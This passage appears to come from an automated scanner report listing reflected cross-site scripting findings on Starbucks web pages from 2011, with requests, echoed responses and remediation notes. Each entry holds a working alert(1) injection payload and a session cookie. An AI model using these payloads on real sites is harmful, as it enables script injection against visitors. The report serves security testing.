<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/career-center?cd912"style="x:expression(alert(1))"c7bd23ee043=1" /> ...[SNIP]...
1.625. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23fe"%3balert(1)//0dffb39826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c23fe";alert(1)//0dffb39826 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /career-center?c23fe"%3balert(1)//0dffb39826=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:22:15 GMT Connection: close Content-Length: 42747
1.626. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center/career-diversity
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45639"style="x:expression(alert(1))"a3851b9f98e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /career-center/career-diversity?45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:24:02 GMT Connection: close Content-Length: 38646
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity?45639"style="x:expression(alert(1))"a3851b9f98e=1" /> ...[SNIP]...
1.627. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center/career-diversity/partner-networks
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b53"%3balert(1)//fc24e1787a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62b53";alert(1)//fc24e1787a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /career-center/career-diversity/partner-networks?62b53"%3balert(1)//fc24e1787a8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:24:21 GMT Connection: close Content-Length: 40731
1.628. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center/career-diversity/partner-networks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae7f1"style="x:expression(alert(1))"dbb34cb95f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /career-center/career-diversity/partner-networks?ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:24:17 GMT Connection: close Content-Length: 40826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity/partner-networks?ae7f1"style="x:expression(alert(1))"dbb34cb95f4=1" /> ...[SNIP]...
1.629. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center/international-positions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab6ec"style="x:expression(alert(1))"95aa1e09f92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /career-center/international-positions?ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:23:03 GMT Connection: close Content-Length: 36752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/career-center/international-positions?ab6ec"style="x:expression(alert(1))"95aa1e09f92=1" /> ...[SNIP]...
1.630. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center/working-at-starbucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 587cf"style="x:expression(alert(1))"c23cb73b348 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /career-center/working-at-starbucks?587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:22:37 GMT Connection: close Content-Length: 43842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/career-center/working-at-starbucks?587cf"style="x:expression(alert(1))"c23cb73b348=1" /> ...[SNIP]...
1.631. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/career-center/working-at-starbucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 287e3"%3balert(1)//6be60617140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 287e3";alert(1)//6be60617140 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /career-center/working-at-starbucks?287e3"%3balert(1)//6be60617140=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:22:39 GMT Connection: close Content-Length: 43747
1.632. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25c37"%3balert(1)//2d0969caa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25c37";alert(1)//2d0969caa59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee?25c37"%3balert(1)//2d0969caa59=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:09:19 GMT Connection: close Content-Length: 55993
1.633. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be1ba"style="x:expression(alert(1))"2e68e935a83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee?be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:09:15 GMT Connection: close Content-Length: 56088
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee?be1ba"style="x:expression(alert(1))"2e68e935a83=1" /> ...[SNIP]...
1.634. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14736"style%3d"x%3aexpression(alert(1))"c3b68698284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14736"style="x:expression(alert(1))"c3b68698284 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn?14736"style%3d"x%3aexpression(alert(1))"c3b68698284=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:20:36 GMT Connection: close Content-Length: 37684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn?14736"style="x:expression(alert(1))"c3b68698284=1" /> ...[SNIP]...
1.635. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/clover
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29816"style="x:expression(alert(1))"6d1aa7d73d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn/clover?29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:20:45 GMT Connection: close Content-Length: 39129
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?29816"style="x:expression(alert(1))"6d1aa7d73d1=1" /> ...[SNIP]...
1.636. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/flavors-in-your-cup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70f3b"style="x:expression(alert(1))"df67647ac4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn/flavors-in-your-cup?70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:20:57 GMT Connection: close Content-Length: 43949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?70f3b"style="x:expression(alert(1))"df67647ac4c=1" /> ...[SNIP]...
1.637. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1318e"style="x:expression(alert(1))"b348d971bc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions?1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:18:27 GMT Connection: close Content-Length: 50682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?1318e"style="x:expression(alert(1))"b348d971bc6=1" /> ...[SNIP]...
1.638. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/caramel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db288"style%3d"x%3aexpression(alert(1))"ffbed84d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db288"style="x:expression(alert(1))"ffbed84d709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/caramel?db288"style%3d"x%3aexpression(alert(1))"ffbed84d709=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:19:45 GMT Connection: close Content-Length: 41422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?db288"style="x:expression(alert(1))"ffbed84d709=1" /> ...[SNIP]...
1.639. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/cinnamon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68e89"style="x:expression(alert(1))"ef92fe52f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/cinnamon?68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:20:24 GMT Connection: close Content-Length: 41464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?68e89"style="x:expression(alert(1))"ef92fe52f9f=1" /> ...[SNIP]...
1.640. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/savoring
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4203"style="x:expression(alert(1))"93ec1632d62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
